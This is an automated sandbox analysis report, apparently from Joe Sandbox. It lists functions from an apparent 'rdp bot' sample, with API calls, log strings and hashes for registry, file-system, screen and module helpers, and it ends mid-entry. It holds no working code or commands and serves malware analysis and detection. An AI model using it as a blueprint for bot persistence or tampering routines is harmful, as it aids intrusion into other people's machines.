[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FF7C1AB9BFA
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB9B19, 00007FF7C1AB9B49
P, xrefs: 00007FF7C1AB9D7A
(key != NULL), xrefs: 00007FF7C1AB9B3B
, xrefs: 00007FF7C1AB9AD0
P, xrefs: 00007FF7C1AB9C80
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF7C1AB9B04, 00007FF7C1AB9B34
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF7C1AB9AC4
NULL, xrefs: 00007FF7C1AB9C26, 00007FF7C1AB9DDF, 00007FF7C1AB9DEB
, xrefs: 00007FF7C1AB9C0F
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9D15
, xrefs: 00007FF7C1AB9AE1
(root != NULL), xrefs: 00007FF7C1AB9B0B
registry_set_value, xrefs: 00007FF7C1AB9ABD, 00007FF7C1AB9B12, 00007FF7C1AB9B42, 00007FF7C1AB9B82, 00007FF7C1AB9BF3, 00007FF7C1AB9D0E
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF7C1AB9B89

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: CloseOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegSetValueExA failed(root=0x%p,key=%s,param=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_set_value
API String ID: 716145365-86941537
Opcode ID: 470b11bc8360a5496df4d954e5ea8c3597ecfc0ab49a46faaa1b91ca81e1339b
Instruction ID: e06ca7a0a7275f96bb006c13ea56137912234e6c42c84737dbe3d9492baf56ac
Opcode Fuzzy Hash: 470b11bc8360a5496df4d954e5ea8c3597ecfc0ab49a46faaa1b91ca81e1339b
Instruction Fuzzy Hash: 3D812DB190C78A85FB70FF15A850B7DE290AF46764EC40133CD1D47BA5EE9DA988C329

Function 00007FF7C1AB9704 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 192registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00007FF7C1AB9739
RegDeleteValueA.ADVAPI32 ref: 00007FF7C1AB983E
RegCloseKey.ADVAPI32 ref: 00007FF7C1AB9967

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB97AF, 00007FF7C1AB97DF
(key != NULL), xrefs: 00007FF7C1AB97D1
[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu), xrefs: 00007FF7C1AB986C
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF7C1AB979A, 00007FF7C1AB97CA
P, xrefs: 00007FF7C1AB99EC
[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF7C1AB975A
NULL, xrefs: 00007FF7C1AB9898, 00007FF7C1AB9A51, 00007FF7C1AB9A5D
, xrefs: 00007FF7C1AB9881
registry_del_value, xrefs: 00007FF7C1AB9753, 00007FF7C1AB97A8, 00007FF7C1AB97D8, 00007FF7C1AB9818, 00007FF7C1AB9865, 00007FF7C1AB9980
P, xrefs: 00007FF7C1AB98F2
, xrefs: 00007FF7C1AB9878
, xrefs: 00007FF7C1AB9777
[I] (%s) -> Done(root=0x%p,key=%s,param=%s), xrefs: 00007FF7C1AB9987
, xrefs: 00007FF7C1AB9766
(root != NULL), xrefs: 00007FF7C1AB97A1
P, xrefs: 00007FF7C1AB98E9
[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x), xrefs: 00007FF7C1AB981F

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: CloseDeleteOpenValuefflushfwrite
String ID: $ $ $ $(key != NULL)$(root != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$P$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegDeleteValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
API String ID: 3240087161-1026589300
Opcode ID: eba5de4cb462e848e7f028c86fadf832435605f6f1f254ff393ef4948b05702c
Instruction ID: de351e7402e2b99ba157152f8e712c390f4a9e9f9ab4fdce2c411d84c63bc70e
Opcode Fuzzy Hash: eba5de4cb462e848e7f028c86fadf832435605f6f1f254ff393ef4948b05702c
Instruction Fuzzy Hash: B1813DB090C78B81FB60FF44A850BBDE254AF00764EC44133CD5E877A5EEADA985C329

Function 00007FF7C1AB4A4E Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 177stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7C1AB4A6D
CreateDirectoryA.KERNEL32 ref: 00007FF7C1AB4A8F
GetLastError.KERNEL32 ref: 00007FF7C1AB4AE0
_mbscpy.MSVCRT ref: 00007FF7C1AB4B31
strlen.MSVCRT ref: 00007FF7C1AB4B39
strlen.MSVCRT ref: 00007FF7C1AB4B55
strlen.MSVCRT ref: 00007FF7C1AB4B66
CreateDirectoryA.KERNEL32 ref: 00007FF7C1AB4BD7
GetLastError.KERNEL32 ref: 00007FF7C1AB4BE1

Strings

(path != NULL), xrefs: 00007FF7C1AB4AB7
[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x), xrefs: 00007FF7C1AB4CB6
NULL, xrefs: 00007FF7C1AB4D07
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu), xrefs: 00007FF7C1AB4B90
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB4AC5
fs_dir_create, xrefs: 00007FF7C1AB4ABE, 00007FF7C1AB4AF2, 00007FF7C1AB4B89, 00007FF7C1AB4CAF, 00007FF7C1AB4D16
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB4AB0
[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu), xrefs: 00007FF7C1AB4AF9
[I] (%s) -> Done(path=%s,recursive=%d), xrefs: 00007FF7C1AB4D1D

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: strlen$CreateDirectoryErrorLast$_mbscpy
String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
API String ID: 3496426206-1059260517
Opcode ID: ba93c12478b578e71c53bdc271007d691fffedd76ab810d95978edcfdf11af81
Instruction ID: 106d98e89d39a794193fd63c7e54380661f55aad9c2f2439dd15b6143b4560e8
Opcode Fuzzy Hash: ba93c12478b578e71c53bdc271007d691fffedd76ab810d95978edcfdf11af81
Instruction Fuzzy Hash: 9F716D31B0C6C28AFB60FF15A850FBD9690AB46BA8F940133DD0F07795DEADA845C321

Function 00007FF7C1AB88E0 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 259registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32 ref: 00007FF7C1AB896D
RegOpenKeyExA.ADVAPI32 ref: 00007FF7C1AB8AAF
RegCloseKey.ADVAPI32 ref: 00007FF7C1AB8CEE

Strings

(subkey_len != NULL), xrefs: 00007FF7C1AB8A7A
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FF7C1AB8CDF
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB89F2, 00007FF7C1AB8A22, 00007FF7C1AB8A55, 00007FF7C1AB8A88
(key != NULL), xrefs: 00007FF7C1AB8A14
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF7C1AB89DD, 00007FF7C1AB8A0D, 00007FF7C1AB8A40, 00007FF7C1AB8A73
[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF7C1AB8AD1
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FF7C1AB89B6
NULL, xrefs: 00007FF7C1AB8DAD
[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu), xrefs: 00007FF7C1AB8B2F
(subkey != NULL), xrefs: 00007FF7C1AB8A47
[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu), xrefs: 00007FF7C1AB8DDC
(root != NULL), xrefs: 00007FF7C1AB89E4
registry_enum_key, xrefs: 00007FF7C1AB89AF, 00007FF7C1AB89EB, 00007FF7C1AB8A1B, 00007FF7C1AB8A4E, 00007FF7C1AB8A81, 00007FF7C1AB8ACA, 00007FF7C1AB8B28, 00007FF7C1AB8CD8, 00007FF7C1AB8DD5

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: CloseEnumOpen
String ID: (key != NULL)$(root != NULL)$(subkey != NULL)$(subkey_len != NULL)$C:/Projects/rdp/bot/codebase/registry.c$NULL$[D] (%s) -> Step(root=0x%p,key=%s,enum_index=%lu,subkey=%s,subkey_len=%llu)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegEnumKeyExA failed(root=0x%p,key=%s,enum_index=%lu,subkey_len=%llu,res=%lu)$[E] (%s) -> RegOpenKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_enum_key
API String ID: 1332880857-2775769510
Opcode ID: 2e43f65ab222b3ac66c053e089489e39d10f0dabbf85cbb61c3ee8f9f1bd7b27
Instruction ID: 9183f816bc45205f39f7f29d088fae7c37cd53967333936e462a44d9dbceecda
Opcode Fuzzy Hash: 2e43f65ab222b3ac66c053e089489e39d10f0dabbf85cbb61c3ee8f9f1bd7b27
Instruction Fuzzy Hash: CDB16E7290C58381FB24EF08A450BBDE651AF807B4F994133DD4E87690CEBEE995D322

Function 00007FF7C1AB42F9 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 123COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FF7C1AB431A
GetLastError.KERNEL32 ref: 00007FF7C1AB43FA

Strings

(path != NULL), xrefs: 00007FF7C1AB4397
NULL, xrefs: 00007FF7C1AB452A
[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF7C1AB436E
(attr != NULL), xrefs: 00007FF7C1AB43D0
fs_attr_get, xrefs: 00007FF7C1AB4367, 00007FF7C1AB439E, 00007FF7C1AB43D7, 00007FF7C1AB4408, 00007FF7C1AB453C
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB43A5, 00007FF7C1AB43DE
c, xrefs: 00007FF7C1AB43C1
[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF7C1AB4543
, xrefs: 00007FF7C1AB441B
P, xrefs: 00007FF7C1AB4483
~, xrefs: 00007FF7C1AB447E
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF7C1AB4390, 00007FF7C1AB43C9
[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF7C1AB440F

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: $(attr != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$P$[D] (%s) -> Done(path=%s,attr=%08lx)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> GetFileAttributesA failed(path=%s,gle=%lu)$c$fs_attr_get$~
API String ID: 1799206407-3397184676
Opcode ID: 9c7336e4765d674d33b340bbc846356eab5d4be4d89593d70358537b7df881f0
Instruction ID: b67de29e6a5779ffd9bbefc72acb81a79a4b1d255b4b907bf2dea69b38d8666b
Opcode Fuzzy Hash: 9c7336e4765d674d33b340bbc846356eab5d4be4d89593d70358537b7df881f0
Instruction Fuzzy Hash: 9B5118B0A0D6978AFB70FE05A550A7CE2507B117B8ED81133CD1F07A91AEEDA985D321

Function 00007FF7C1AB2558 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 191COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00007FF7C1AB2589
GetSystemMetrics.USER32 ref: 00007FF7C1AB259E
GetLastError.KERNEL32 ref: 00007FF7C1AB25AF

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

GetLastError.KERNEL32 ref: 00007FF7C1AB26AC

Strings

c, xrefs: 00007FF7C1AB2651
[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu), xrefs: 00007FF7C1AB25C2
(ratio != NULL), xrefs: 00007FF7C1AB2660
sys_screen_info, xrefs: 00007FF7C1AB25BB, 00007FF7C1AB2607, 00007FF7C1AB2637, 00007FF7C1AB2667, 00007FF7C1AB26B8
[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu), xrefs: 00007FF7C1AB26BF
(height != NULL), xrefs: 00007FF7C1AB2600
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB260E, 00007FF7C1AB263E, 00007FF7C1AB266E
C:/Projects/rdp/bot/codebase/sys.c, xrefs: 00007FF7C1AB25F9, 00007FF7C1AB2629, 00007FF7C1AB2659
(width != NULL), xrefs: 00007FF7C1AB2630

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ErrorLastMetricsSystem$fflushfwrite
String ID: (height != NULL)$(ratio != NULL)$(width != NULL)$C:/Projects/rdp/bot/codebase/sys.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> GetSystemMetrics(SM_CXSCREEN) failed(gle=%lu)$[E] (%s) -> GetSystemMetrics(SM_CYSCREEN) failed(gle=%lu)$c$sys_screen_info
API String ID: 144387239-450147120
Opcode ID: fe720279f8c7f6c7139840da8b033ee7716de9ef5324ac21d572082e249eae40
Instruction ID: 5b3697a30b3a235c2a3ca64217286a011321d28776be2fffc1c945588a655bf6
Opcode Fuzzy Hash: fe720279f8c7f6c7139840da8b033ee7716de9ef5324ac21d572082e249eae40
Instruction Fuzzy Hash: 00712B70A0C58381FB21FE59A524F7DA192AB147A8F904033ED0E4B2A5DEEDF990D361

Function 00007FF7C1AB2029 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 103COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32 ref: 00007FF7C1AB2056
LoadResource.KERNEL32 ref: 00007FF7C1AB206E

Part of subcall function 00007FF7C1AB2EF2: fwrite.MSVCRT ref: 00007FF7C1AB2F9E
Part of subcall function 00007FF7C1AB2EF2: fflush.MSVCRT ref: 00007FF7C1AB2FAA

GetLastError.KERNEL32 ref: 00007FF7C1AB2168
GetLastError.KERNEL32 ref: 00007FF7C1AB219D
GetLastError.KERNEL32 ref: 00007FF7C1AB21A2

Strings

(hnd != NULL), xrefs: 00007FF7C1AB2121
(out != NULL), xrefs: 00007FF7C1AB214C
[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat, xrefs: 00007FF7C1AB20F6
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB212F, 00007FF7C1AB215A
module_get_version, xrefs: 00007FF7C1AB20EF, 00007FF7C1AB2128, 00007FF7C1AB2153, 00007FF7C1AB2176, 00007FF7C1AB21AB
C:/Projects/rdp/bot/codebase/module.c, xrefs: 00007FF7C1AB211A, 00007FF7C1AB2145
[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu), xrefs: 00007FF7C1AB21B2
[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu), xrefs: 00007FF7C1AB217D

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: ErrorLast$Resource$FindLoadfflushfwrite
String ID: (hnd != NULL)$(out != NULL)$C:/Projects/rdp/bot/codebase/module.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> FindResourceA failed(hnd=0x%p,gle=%lu)$[E] (%s) -> LoadResource failed(hnd=0x%p,gle=%lu)$[I] (%s) -> Done(hnd=0x%p,dwSignature=%08lx,dwStrucVersion=%08lx,dwFileVersionMS=%08lx,dwFileVersionLS=%08lx,dwProductVersionMS=%08lx,dwProductVersionLS=%08lx,dwFileFlagsMask=%08lx,dwFileFlags=%08lx,dwFileOS=%08lx,dwFileType=%08lx,dwFileSubtype=%08lx,dwFileDat$module_get_version
API String ID: 2123903355-2019010457
Opcode ID: 03568839cbc286dbeade8a1880738849ae21df82849d251337ce766ead38c4a3
Instruction ID: eecbec56df98d55346e318d1daeec8a98ac3865226f042efcef86fa1fecfb2ef
Opcode Fuzzy Hash: 03568839cbc286dbeade8a1880738849ae21df82849d251337ce766ead38c4a3
Instruction Fuzzy Hash: 174154B5A082428AE750EF29E65096EF7A1FB587A4F800137DE1C83795EFBDE441C710

Function 00007FF7C1AB9034 Relevance: 21.1, APIs: 2, Strings: 10, Instructions: 116registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExA.ADVAPI32 ref: 00007FF7C1AB908C
RegCloseKey.ADVAPI32 ref: 00007FF7C1AB90B1

Strings

NULL, xrefs: 00007FF7C1AB9236
[I] (%s) -> Done(root=0x%p,key=%s), xrefs: 00007FF7C1AB90C8
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB90F6, 00007FF7C1AB9126
(key != NULL), xrefs: 00007FF7C1AB9118
registry_create_key, xrefs: 00007FF7C1AB90C1, 00007FF7C1AB90EF, 00007FF7C1AB911F, 00007FF7C1AB9151, 00007FF7C1AB9182
(root != NULL), xrefs: 00007FF7C1AB90E8
[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu), xrefs: 00007FF7C1AB9189
C:/Projects/rdp/bot/codebase/registry.c, xrefs: 00007FF7C1AB90E1, 00007FF7C1AB9111
?, xrefs: 00007FF7C1AB9070
[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x), xrefs: 00007FF7C1AB9158

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: CloseCreate
String ID: (key != NULL)$(root != NULL)$?$C:/Projects/rdp/bot/codebase/registry.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,err=%08x)$[E] (%s) -> RegCreateKeyExA failed(root=0x%p,key=%s,res=%lu)$[I] (%s) -> Done(root=0x%p,key=%s)$registry_create_key
API String ID: 2932200918-3746808683
Opcode ID: c757dc4ad3dd0fc64ac37562a1262f6cb1cecffa34e926813ffbbe5d014ef5ac
Instruction ID: 9eef1758e558862d24980df16347af5c497e3c20ef5f1d41d2edc85aaf63fe66
Opcode Fuzzy Hash: c757dc4ad3dd0fc64ac37562a1262f6cb1cecffa34e926813ffbbe5d014ef5ac
Instruction Fuzzy Hash: 715189B2E0C69291FBA0EF14A854ABDE260BF007B4FC44137CD4D576A0DFADA985D364

Function 00007FF7C1AB4041 Relevance: 19.6, APIs: 6, Strings: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7C1AB4106
GetProcessHeap.KERNEL32 ref: 00007FF7C1AB4114
HeapAlloc.KERNEL32 ref: 00007FF7C1AB4125
strlen.MSVCRT ref: 00007FF7C1AB4143
GetProcessHeap.KERNEL32 ref: 00007FF7C1AB4171
HeapFree.KERNEL32 ref: 00007FF7C1AB4182

Strings

C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FF7C1AB40A6, 00007FF7C1AB40D6
mem_alloc, xrefs: 00007FF7C1AB4190
(buf != NULL), xrefs: 00007FF7C1AB40AD
(buf_sz != NULL), xrefs: 00007FF7C1AB40DD
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF7C1AB40BB, 00007FF7C1AB40EB
ini_get_bytes, xrefs: 00007FF7C1AB40B4, 00007FF7C1AB40E4
[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FF7C1AB4197

Memory Dump Source

Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true

Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd

Similarity

API ID: Heap$Processstrlen$AllocFree
String ID: (buf != NULL)$(buf_sz != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Memory allocation failed(size=%llu)$ini_get_bytes$mem_alloc
API String ID: 1318626975-3964590784
Opcode ID: fa179d4c557b06b4e4781d2b4c9ac96fdb4b2f92b3d62cdd309cb42eab5bc487
Instruction ID: de382366863e4257465f793cbbe0ff285a507511499835b41d51d1c1d8ef4a03
Opcode Fuzzy Hash: fa179d4c557b06b4e4781d2b4c9ac96fdb4b2f92b3d62cdd309cb42eab5bc487
Instruction Fuzzy Hash: 7F314C75A08A8789FB50AF21A910BBDA660AF507A8F844033DD4E47795DFBDE846C360

Function 00007FF7C1AB4554 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 135COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7C1AB462E

Part of subcall function 00007FF7C1AB42F9: GetFileAttributesA.KERNEL32 ref: 00007FF7C1AB431A

SetFileAttributesA.KERNEL32 ref: 00007FF7C1AB459B

Strings

[D] (%s) -> Done(path=%s,attr=%08lx), xrefs: 00007FF7C1AB477A
(path != NULL), xrefs: 00007FF7C1AB45C0
NULL, xrefs: 00007FF7C1AB4764
[E] (%s) -> SetFileAttributesA failed(path=%s,gle=%lu), xrefs: 00007FF7C1AB4645
